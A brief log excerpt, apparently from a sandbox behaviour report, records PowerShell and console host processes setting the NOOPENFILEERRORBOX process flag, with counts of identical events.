Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (93 identical events)
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (24 identical events)